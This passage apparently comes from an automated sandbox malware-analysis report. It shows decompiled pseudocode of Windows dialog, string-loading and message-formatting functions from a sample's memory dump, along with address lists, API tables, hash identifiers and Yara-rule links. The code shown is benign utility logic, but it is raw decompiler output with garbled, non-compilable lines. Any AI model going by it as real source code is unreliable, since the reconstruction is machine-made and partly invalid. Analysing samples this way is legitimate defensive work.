							_t35 = E00406D16(_t39,  *0x413274);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_t46 =  *0x413290; // 0x1000
								_push(_t46 - 1);
								_push( *0x413274);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x413274);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_t49 =  *0x413290; // 0x1000
						_push(_t49 - 1);
						_push( *0x413274);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40f454;
					} else {
						_t27 =  *0x413284; // 0xcd
						_t10 = _t61 + 2; // 0xcf
						_t72 = _t27 + _t10 -  *0x413288; // 0x8000
						if(_t72 >= 0) {
							goto L20;
						} else {
							_t42 =  *0x413280; // 0x18
							_t73 = _t42 -  *0x41328c; // 0x100
							if(_t73 >= 0) {
								goto L20;
							} else {
								_t43 =  *0x413270; // 0x2150048
								_t57 = _t43 + _t27 * 2;
								_t14 = _t61 + 2; // 0x2
								memcpy(_t57,  *0x413274, _t61 + _t14);
								_t30 =  *0x413280; // 0x18
								_t44 =  *0x413284; // 0xcd
								_t54 =  *0x41327c; // 0x9a7528
								 *(_t54 + _t30 * 4) = _t44;
								_t31 =  *0x413280; // 0x18
								_t45 =  *0x413278; // 0x9a7120
								 *(_t45 + _t31 * 4) = _t39;
								_t32 =  *0x413284; // 0xcd
								 *0x413280 =  *0x413280 + 1;
								 *0x413284 = _t32 + _t61 + 1;
								if(_t57 != 0) {
									goto L21;
								} else {
									goto L20;
								}
							}
						}
					}
				}
				return _t22;
			}






























                                                                                                                                                      0x00406827
                                                                                                                                                      0x0040682e
                                                                                                                                                      0x00406830
                                                                                                                                                      0x00406830
                                                                                                                                                      0x00406835
                                                                                                                                                      0x0040683c
                                                                                                                                                      0x00406841
                                                                                                                                                      0x00406853
                                                                                                                                                      0x00406853
                                                                                                                                                      0x00406843
                                                                                                                                                      0x00406843
                                                                                                                                                      0x00406843
                                                                                                                                                      0x0040684c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040684e
                                                                                                                                                      0x00406851
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406851
                                                                                                                                                      0x00406880
                                                                                                                                                      0x00406889
                                                                                                                                                      0x0040688f
                                                                                                                                                      0x0040688f
                                                                                                                                                      0x00406855
                                                                                                                                                      0x00406857
                                                                                                                                                      0x00406988
                                                                                                                                                      0x00406988
                                                                                                                                                      0x0040685d
                                                                                                                                                      0x00406863
                                                                                                                                                      0x0040689c
                                                                                                                                                      0x004068eb
                                                                                                                                                      0x004068f1
                                                                                                                                                      0x004068f2
                                                                                                                                                      0x004068f8
                                                                                                                                                      0x004068f9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040689e
                                                                                                                                                      0x004068a8
                                                                                                                                                      0x004068b4
                                                                                                                                                      0x004068b9
                                                                                                                                                      0x004068be
                                                                                                                                                      0x004068d2
                                                                                                                                                      0x004068d4
                                                                                                                                                      0x004068da
                                                                                                                                                      0x004068e1
                                                                                                                                                      0x004068e2
                                                                                                                                                      0x004068e8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004068c0
                                                                                                                                                      0x004068cb
                                                                                                                                                      0x004068d0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004068d0
                                                                                                                                                      0x004068be
                                                                                                                                                      0x00406865
                                                                                                                                                      0x00406866
                                                                                                                                                      0x0040686c
                                                                                                                                                      0x00406873
                                                                                                                                                      0x00406874
                                                                                                                                                      0x0040687d
                                                                                                                                                      0x004068fe
                                                                                                                                                      0x00406905
                                                                                                                                                      0x00406907
                                                                                                                                                      0x00406907
                                                                                                                                                      0x00406909
                                                                                                                                                      0x00406981
                                                                                                                                                      0x00406981
                                                                                                                                                      0x0040690b
                                                                                                                                                      0x0040690b
                                                                                                                                                      0x00406910
                                                                                                                                                      0x00406914
                                                                                                                                                      0x0040691a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040691c
                                                                                                                                                      0x0040691c
                                                                                                                                                      0x00406922
                                                                                                                                                      0x00406928
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040692a
                                                                                                                                                      0x0040692a
                                                                                                                                                      0x00406930
                                                                                                                                                      0x00406933
                                                                                                                                                      0x0040693f
                                                                                                                                                      0x00406944
                                                                                                                                                      0x00406949
                                                                                                                                                      0x0040694f
                                                                                                                                                      0x00406955
                                                                                                                                                      0x00406958
                                                                                                                                                      0x0040695d
                                                                                                                                                      0x00406963
                                                                                                                                                      0x00406966
                                                                                                                                                      0x0040696e
                                                                                                                                                      0x0040697a
                                                                                                                                                      0x0040697f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040697f
                                                                                                                                                      0x00406928
                                                                                                                                                      0x0040691a
                                                                                                                                                      0x00406909
                                                                                                                                                      0x0040698c

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                      • wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                        • Part of subcall function 00406D16: memset.MSVCRT ref: 00406D29
                                                                                                                                                        • Part of subcall function 00406D16: _itow.MSVCRT ref: 00406D37
                                                                                                                                                      • wcslen.MSVCRT ref: 004068C6
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                      • LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                      • memcpy.MSVCRT ref: 0040693F
                                                                                                                                                        • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067BF
                                                                                                                                                        • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067DD
                                                                                                                                                        • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067FB
                                                                                                                                                        • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 00406819
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                      • String ID: strings
                                                                                                                                                      • API String ID: 3166385802-3030018805
                                                                                                                                                      • Opcode ID: c72559ebadd3ea1b83e8afb84d1d37b4e66ec646cef112fd2340ea135da12479
                                                                                                                                                      • Instruction ID: b83127d2a15bee255c74f42c5a27ad94469461630f4946f0f4b43b8e5d041769
                                                                                                                                                      • Opcode Fuzzy Hash: c72559ebadd3ea1b83e8afb84d1d37b4e66ec646cef112fd2340ea135da12479
                                                                                                                                                      • Instruction Fuzzy Hash: 1641B375200102AFDB14FF18ED849B673A1F754306711C1FEE806B76A1DB7AAA22CB5C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00406050, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                                      			E00406050(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 8;
				do {
					_push( *_t52);
					_push( *((intOrPtr*)(_t52 - 4)));
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040DFD6();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                                                                                                      0x0040605b
                                                                                                                                                      0x0040606a
                                                                                                                                                      0x00406071
                                                                                                                                                      0x00406079
                                                                                                                                                      0x0040607c
                                                                                                                                                      0x0040607f
                                                                                                                                                      0x00406082
                                                                                                                                                      0x00406089
                                                                                                                                                      0x00406089
                                                                                                                                                      0x00406091
                                                                                                                                                      0x00406094
                                                                                                                                                      0x00406099
                                                                                                                                                      0x0040609e
                                                                                                                                                      0x0040609f
                                                                                                                                                      0x004060ab
                                                                                                                                                      0x004060b0
                                                                                                                                                      0x004060c3
                                                                                                                                                      0x004060cd
                                                                                                                                                      0x004060d1
                                                                                                                                                      0x004060d6
                                                                                                                                                      0x004060e4
                                                                                                                                                      0x004060ec
                                                                                                                                                      0x004060ef
                                                                                                                                                      0x004060f2
                                                                                                                                                      0x004060f2
                                                                                                                                                      0x004060f5
                                                                                                                                                      0x004060f5
                                                                                                                                                      0x004060fb
                                                                                                                                                      0x004060fe
                                                                                                                                                      0x00406102
                                                                                                                                                      0x0040610c

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                      • String ID: %s (%s)
                                                                                                                                                      • API String ID: 3979103747-1363028141
                                                                                                                                                      • Opcode ID: 30fd9e651f075bdc212a63d8535efddc7708ae92d198bbf9a9235320ecc61d8a
                                                                                                                                                      • Instruction ID: f719391f3769af673f645ccb22e5d53aea3ed69308020c87343d88254f0aea6b
                                                                                                                                                      • Opcode Fuzzy Hash: 30fd9e651f075bdc212a63d8535efddc7708ae92d198bbf9a9235320ecc61d8a
                                                                                                                                                      • Instruction Fuzzy Hash: 27119072800119EBCF20DF95CC45ECAB7F9FF00308F1144BAE944B7152EBB5A6588B94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00406F88, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                                      			E00406F88(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040E340(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040E03E();
					if(_t26 != 0) {
						E00406E5E(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                                                                                                      0x00406f90
                                                                                                                                                      0x00406fa6
                                                                                                                                                      0x00406fad
                                                                                                                                                      0x00406fb8
                                                                                                                                                      0x00406fbe
                                                                                                                                                      0x00406fcf
                                                                                                                                                      0x00406fd7
                                                                                                                                                      0x00406fef
                                                                                                                                                      0x00406ff6
                                                                                                                                                      0x0040700d
                                                                                                                                                      0x00407013
                                                                                                                                                      0x00407019
                                                                                                                                                      0x0040701e
                                                                                                                                                      0x0040701f
                                                                                                                                                      0x00407028
                                                                                                                                                      0x00407032
                                                                                                                                                      0x00407038
                                                                                                                                                      0x00407028
                                                                                                                                                      0x0040703f

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                      • String ID: sysdatetimepick32
                                                                                                                                                      • API String ID: 1028950076-4169760276
                                                                                                                                                      • Opcode ID: 9d19a4fbb2cd0ec1623eaacac27ee37a612a64ef46b18b0cb24cdd6c82670a9a
                                                                                                                                                      • Instruction ID: 57a1b33134393eb8e1d887e85ad6c32cde466d51f9494c9a374c65f7fd7f5279
                                                                                                                                                      • Opcode Fuzzy Hash: 9d19a4fbb2cd0ec1623eaacac27ee37a612a64ef46b18b0cb24cdd6c82670a9a
                                                                                                                                                      • Instruction Fuzzy Hash: 0C11A7329042197ADB24EF91DD49A9B7B7CEF04750F0040BAF508E2091E7755A55CB99
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004052B3, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E004052B3(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40f454);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                                                                                      0x004052b3
                                                                                                                                                      0x004052c1
                                                                                                                                                      0x004052c9
                                                                                                                                                      0x004052ce
                                                                                                                                                      0x004052d8
                                                                                                                                                      0x004052e0
                                                                                                                                                      0x004052e2
                                                                                                                                                      0x004052e2
                                                                                                                                                      0x004052e0
                                                                                                                                                      0x004052fe
                                                                                                                                                      0x0040532d
                                                                                                                                                      0x00405300
                                                                                                                                                      0x0040530b
                                                                                                                                                      0x00405313
                                                                                                                                                      0x00405319
                                                                                                                                                      0x0040531d
                                                                                                                                                      0x0040531d
                                                                                                                                                      0x00405337

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004053D9,?,00000000,?,004097E7,00000000,?,?,00000001), ref: 004052D8
                                                                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004053D9,?,00000000,?,004097E7), ref: 004052F6
                                                                                                                                                      • wcslen.MSVCRT ref: 00405303
                                                                                                                                                      • wcscpy.MSVCRT ref: 00405313
                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004053D9,?,00000000,?,004097E7,00000000), ref: 0040531D
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040532D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                      • String ID: netmsg.dll
                                                                                                                                                      • API String ID: 2767993716-3706735626
                                                                                                                                                      • Opcode ID: cf43997b40231719751c74f47c5e443f472dd436546a9e994edbce1860f8f999
                                                                                                                                                      • Instruction ID: 17948da3eb349c1f06e63398449681b55ea015706cd50f91573ee618f1a58307
                                                                                                                                                      • Opcode Fuzzy Hash: cf43997b40231719751c74f47c5e443f472dd436546a9e994edbce1860f8f999
                                                                                                                                                      • Instruction Fuzzy Hash: 3101D431501114BAE7242791EC0AF9F7B68DF047A5B20043AF902B40D2DA756E10CA9C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040103E, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E0040103E(void* __esi, void* __eflags) {
				signed int _v8;
				struct tagLOGFONTW _v100;
				signed int _t14;
				int _t21;
				long _t22;
				signed int _t25;
				struct HDC__* _t27;
				intOrPtr _t33;

				_t27 = GetDC(0);
				_t14 = GetDeviceCaps(_t27, 0x5a);
				_t25 = 0x60;
				asm("cdq");
				_v8 = _t14 * 0xe / _t25;
				ReleaseDC(0, _t27);
				E00405833( &_v100, L"MS Sans Serif", _v8, 1);
				_t21 = CreateFontIndirectW( &_v100);
				 *(__esi + 0x43c) = _t21;
				_t22 = SendDlgItemMessageW( *(__esi + 0x10), 0x3ec, 0x30, _t21, 0);
				_t33 =  *0x412fd0; // 0x0
				if(_t33 != 0) {
					return SendDlgItemMessageW( *(__esi + 0x10), 0x3ee, 0x30,  *(__esi + 0x43c), 0);
				}
				return _t22;
			}











                                                                                                                                                      0x0040104f
                                                                                                                                                      0x00401054
                                                                                                                                                      0x0040105f
                                                                                                                                                      0x00401060
                                                                                                                                                      0x00401065
                                                                                                                                                      0x00401068
                                                                                                                                                      0x0040107b
                                                                                                                                                      0x00401087
                                                                                                                                                      0x0040109f
                                                                                                                                                      0x004010a5
                                                                                                                                                      0x004010a7
                                                                                                                                                      0x004010ae
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004010c1
                                                                                                                                                      0x004010c6

                                                                                                                                                      APIs
                                                                                                                                                      • GetDC.USER32(00000000), ref: 00401049
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401054
                                                                                                                                                      • ReleaseDC.USER32 ref: 00401068
                                                                                                                                                        • Part of subcall function 00405833: memset.MSVCRT ref: 0040583D
                                                                                                                                                        • Part of subcall function 00405833: wcscpy.MSVCRT ref: 0040587D
                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401087
                                                                                                                                                      • SendDlgItemMessageW.USER32 ref: 004010A5
                                                                                                                                                      • SendDlgItemMessageW.USER32 ref: 004010C1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemMessageSend$CapsCreateDeviceFontIndirectReleasememsetwcscpy
                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                      • API String ID: 1274520933-168460110
                                                                                                                                                      • Opcode ID: ed0759a4ae7ee862ca49db622f2c3c3492c51a7824ce9ae620841ebe78710657
                                                                                                                                                      • Instruction ID: 76445cfa4d73c44bf9acfae61aa42174960e6aa773b684d89c5daaca756457af
                                                                                                                                                      • Opcode Fuzzy Hash: ed0759a4ae7ee862ca49db622f2c3c3492c51a7824ce9ae620841ebe78710657
                                                                                                                                                      • Instruction Fuzzy Hash: 58019E71600308BBE7216BB0DD89F2B76BDF780700F000439F601F60D0D6B0AA188B68
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00403333, Relevance: 12.2, APIs: 8, Instructions: 199windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00403333(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
				void* __edi;
				void* __esi;
				void* _t75;
				signed int _t77;
				signed int _t91;
				signed int _t92;
				void* _t100;
				void* _t104;
				short* _t122;
				unsigned int _t128;
				intOrPtr _t131;
				signed int _t134;
				void* _t149;
				void* _t150;
				intOrPtr* _t151;
				short _t157;
				signed int _t158;

				_t132 = __ecx;
				_t75 = _a4 - 0x4e;
				_t158 = __ecx;
				if(_t75 == 0) {
					_t151 = _a12;
					__eflags =  *((intOrPtr*)(_t151 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t151 + 8)) == 0xfffffffd) {
						__eflags =  *((intOrPtr*)(_t151 + 4)) - 0x3e9;
						if(__eflags == 0) {
							E00402D48(__eflags,  *_t151,  *(_t151 + 0xc));
						}
					}
					__eflags =  *((intOrPtr*)(_t151 + 8)) - 0xffffff9b;
					if( *((intOrPtr*)(_t151 + 8)) != 0xffffff9b) {
						L27:
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *((intOrPtr*)(_t151 + 4)) - 0x3e9;
						if( *((intOrPtr*)(_t151 + 4)) != 0x3e9) {
							goto L27;
						}
						_t77 =  *(_t151 + 0x14);
						__eflags = _t77 & 0x00000002;
						if((_t77 & 0x00000002) == 0) {
							L36:
							_t134 =  *(_t151 + 0x18) ^ _t77;
							__eflags = 0x0000f000 & _t134;
							if((0x0000f000 & _t134) == 0) {
								L39:
								__eflags =  *(_t151 + 0x14) & 0x00000002;
								if(( *(_t151 + 0x14) & 0x00000002) == 0) {
									goto L27;
								}
								__eflags =  *(_t151 + 0x18) & 0x00000002;
								if(( *(_t151 + 0x18) & 0x00000002) != 0) {
									goto L27;
								}
								__eflags =  *(_t151 + 0xc);
								E004013E1(_t158, 0x3eb, 0 |  *(_t151 + 0xc) != 0x00000000);
								__eflags =  *(_t151 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4)) - 1;
								E004013E1(_t158, 0x3ec, 0 |  *(_t151 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4)) - 0x00000001);
								 *((intOrPtr*)(_t158 + 0x48)) = 1;
								SetDlgItemInt( *(_t158 + 0x10), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)))) +  *(_t151 + 0x28) * 4), 0);
								 *((intOrPtr*)(_t158 + 0x48)) = 0;
								return 1;
							}
							L37:
							_t91 = E004027F9( *_t151,  *(_t151 + 0xc), 0xf002);
							__eflags = _t91 & 0x00000002;
							if((_t91 & 0x00000002) != 0) {
								_t92 = _t91 & 0x0000f000;
								__eflags = _t92 - 0x1000;
								_a8 = _t92;
								E004013E1(_t158, 0x3ee, 0 | _t92 == 0x00001000);
								_a8 - 0x2000 = _a8 == 0x2000;
								E004013E1(_t158, 0x3ef, 0 | _a8 == 0x00002000);
							}
							goto L39;
						}
						__eflags =  *(_t151 + 0x18) & 0x00000002;
						if(( *(_t151 + 0x18) & 0x00000002) == 0) {
							goto L37;
						}
						goto L36;
					}
				}
				_t100 = _t75 - 0xc2;
				if(_t100 == 0) {
					SendDlgItemMessageW( *(__ecx + 0x10), 0x3ed, 0xc5, 3, 0);
					E004031BE(_t158);
					E00405B17(_t149,  *(_t158 + 0x10), 0);
					goto L27;
				}
				_t104 = _t100 - 1;
				if(_t104 != 0) {
					goto L27;
				}
				_t128 = _a8 >> 0x10;
				if( *((intOrPtr*)(__ecx + 0x48)) != _t104 || _t128 != 0x300) {
					L7:
					if(_t128 != 0) {
						goto L27;
					}
					if(_a8 != 0x3f0) {
						L13:
						if(_a8 == 0x3eb) {
							E00402AD0(GetDlgItem( *(_t158 + 0x10), 0x3e9), _t132);
						}
						if(_a8 == 0x3ec) {
							E00402B13(GetDlgItem( *(_t158 + 0x10), 0x3e9), _t132);
						}
						if(_a8 == 0x3ee) {
							E00402B4D(GetDlgItem( *(_t158 + 0x10), 0x3e9), 1);
						}
						if(_a8 == 0x3ef) {
							E00402B4D(GetDlgItem( *(_t158 + 0x10), 0x3e9), 0);
						}
						if(_a8 == 2) {
							EndDialog( *(_t158 + 0x10), 2);
						}
						if(_a8 == 1) {
							E0040314A(_t158);
							EndDialog( *(_t158 + 0x10), 1);
						}
						return 1;
					}
					_t131 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4));
					_t132 = 0;
					if(_t131 <= 0) {
						L12:
						E004031BE(_t158);
						goto L13;
					}
					_t150 = 0;
					do {
						_t122 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)))) + _t132 * 4;
						 *(_t122 + 2) = _t132;
						_t157 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x44)) + _t150 + 0xc));
						_t132 = _t132 + 1;
						_t150 = _t150 + 0x14;
						 *_t122 = _t157;
					} while (_t132 < _t131);
					goto L12;
				} else {
					if(_a8 != 0x3ed) {
						goto L27;
					} else {
						E004030F2(__ecx, __ecx);
						goto L7;
					}
				}
			}




















                                                                                                                                                      0x00403333
                                                                                                                                                      0x00403339
                                                                                                                                                      0x0040333f
                                                                                                                                                      0x00403341
                                                                                                                                                      0x00403481
                                                                                                                                                      0x00403484
                                                                                                                                                      0x0040348d
                                                                                                                                                      0x0040348f
                                                                                                                                                      0x00403492
                                                                                                                                                      0x00403499
                                                                                                                                                      0x0040349f
                                                                                                                                                      0x00403492
                                                                                                                                                      0x004034a0
                                                                                                                                                      0x004034a4
                                                                                                                                                      0x00403478
                                                                                                                                                      0x00403478
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004034a6
                                                                                                                                                      0x004034a6
                                                                                                                                                      0x004034a9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004034ab
                                                                                                                                                      0x004034ae
                                                                                                                                                      0x004034b5
                                                                                                                                                      0x004034bd
                                                                                                                                                      0x004034c0
                                                                                                                                                      0x004034c2
                                                                                                                                                      0x004034c4
                                                                                                                                                      0x00403511
                                                                                                                                                      0x00403511
                                                                                                                                                      0x00403515
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040351b
                                                                                                                                                      0x0040351f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403529
                                                                                                                                                      0x00403537
                                                                                                                                                      0x00403545
                                                                                                                                                      0x00403553
                                                                                                                                                      0x00403571
                                                                                                                                                      0x00403574
                                                                                                                                                      0x0040357a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040357d
                                                                                                                                                      0x004034c6
                                                                                                                                                      0x004034d0
                                                                                                                                                      0x004034d8
                                                                                                                                                      0x004034da
                                                                                                                                                      0x004034dc
                                                                                                                                                      0x004034e0
                                                                                                                                                      0x004034e8
                                                                                                                                                      0x004034f3
                                                                                                                                                      0x00403501
                                                                                                                                                      0x0040350c
                                                                                                                                                      0x0040350c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004034da
                                                                                                                                                      0x004034b7
                                                                                                                                                      0x004034bb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004034bb
                                                                                                                                                      0x004034a4
                                                                                                                                                      0x00403347
                                                                                                                                                      0x0040334c
                                                                                                                                                      0x00403460
                                                                                                                                                      0x00403467
                                                                                                                                                      0x00403471
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403477
                                                                                                                                                      0x00403352
                                                                                                                                                      0x00403353
                                                                                                                                                      0x00000000
